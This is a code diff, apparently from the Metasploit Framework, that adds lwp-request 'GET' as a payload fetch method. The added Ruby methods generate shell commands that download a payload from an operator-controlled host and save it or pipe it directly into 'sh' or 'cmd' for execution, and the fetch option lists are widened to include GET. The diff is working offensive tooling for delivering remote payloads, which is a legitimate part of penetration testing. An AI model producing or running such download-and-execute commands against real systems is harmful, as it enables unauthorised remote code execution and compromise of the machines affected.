Msf::Payload::Adapter::Fetch: Add lwp-request GET fetch adapter

Author: bcoles

lib/msf/core/payload/adapter/fetch.rb

@@ -86,7 +86,7 @@ def fetch_bindnetloc
   def pipe_supported_binaries
     # this is going to expand when we add psh support
     return %w[CURL] if windows?
-    %w[WGET CURL]
+    %w[WGET GET CURL]
   end
 
   def generate(opts = {})
@@ -115,6 +115,8 @@ def generate_pipe_command
     case datastore['FETCH_COMMAND'].upcase
     when 'WGET'
       return _generate_wget_pipe
+    when 'GET'
+      return _generate_get_pipe
     when 'CURL'
       return _generate_curl_pipe
     else
@@ -132,6 +134,8 @@ def generate_fetch_commands
       return _generate_tnftp_command
     when 'WGET'
       return _generate_wget_command
+    when 'GET'
+      return _generate_get_command
     when 'CURL'
       return _generate_curl_command
     when 'TFTP'
@@ -336,6 +340,43 @@ def _generate_curl_pipe
     end
   end
 
+  def _generate_get_command
+    # Specifying the method (-m GET) is necessary on OSX
+    case fetch_protocol
+    when 'HTTP'
+      get_file_cmd = "GET -m GET http://#{download_uri}>#{_remote_destination}"
+    when 'HTTPS'
+      # There is no way to disable cert check in GET ...
+      print_error('GET binary does not support insecure mode')
+      fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using GET')
+      get_file_cmd = "GET -m GET https://#{download_uri}>#{_remote_destination}"
+    when 'FTP'
+      get_file_cmd = "GET ftp://#{download_uri}>#{_remote_destination}"
+    else
+      fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
+    end
+    _execute_add(get_file_cmd)
+  end
+
+  def _generate_get_pipe
+    # Specifying the method (-m GET) is necessary on OSX
+    execute_cmd = 'sh'
+    execute_cmd = 'cmd' if windows?
+    case fetch_protocol
+    when 'HTTP'
+      return "GET -m GET http://#{_download_pipe}|#{execute_cmd}"
+    when 'HTTPS'
+      # There is no way to disable cert check in GET ...
+      print_error('GET binary does not support insecure mode')
+      fail_with(Msf::Module::Failure::BadConfig, 'FETCH_CHECK_CERT must be true when using GET')
+      return "GET -m GET https://#{_download_pipe}|#{execute_cmd}"
+    when 'FTP'
+      return "GET ftp://#{_download_pipe}|#{execute_cmd}"
+    else
+      fail_with(Msf::Module::Failure::BadConfig, "Unsupported protocol: #{fetch_protocol.inspect}")
+    end
+  end
+
   def _generate_ftp_command
     case fetch_protocol
     when 'FTP'

lib/msf/core/payload/adapter/fetch/linux_options.rb

@@ -3,10 +3,10 @@ def initialize(info = {})
     super
     register_options(
       [
-        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP TFTP TNFTP WGET]]),
+        Msf::OptEnum.new('FETCH_COMMAND', [true, 'Command to fetch payload', 'CURL', %w[CURL FTP GET TFTP TNFTP WGET]]),
         Msf::OptEnum.new('FETCH_FILELESS', [true, 'Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8','none', ['none','bash','python3.8+']]),
         Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: %r{^[^\s/\\]*$}, conditions: ['FETCH_FILELESS', '==', 'none']),
-        Msf::OptBool.new('FETCH_PIPE', [true, 'Host both the binary payload and the command so it can be piped directly to the shell.', false], conditions: ['FETCH_COMMAND', 'in', %w[CURL WGET]]),
+        Msf::OptBool.new('FETCH_PIPE', [true, 'Host both the binary payload and the command so it can be piped directly to the shell.', false], conditions: ['FETCH_COMMAND', 'in', %w[CURL GET WGET]]),
         Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', './'], regex: /^\S*$/, conditions: ['FETCH_FILELESS', '==', 'none'])
       ]
     )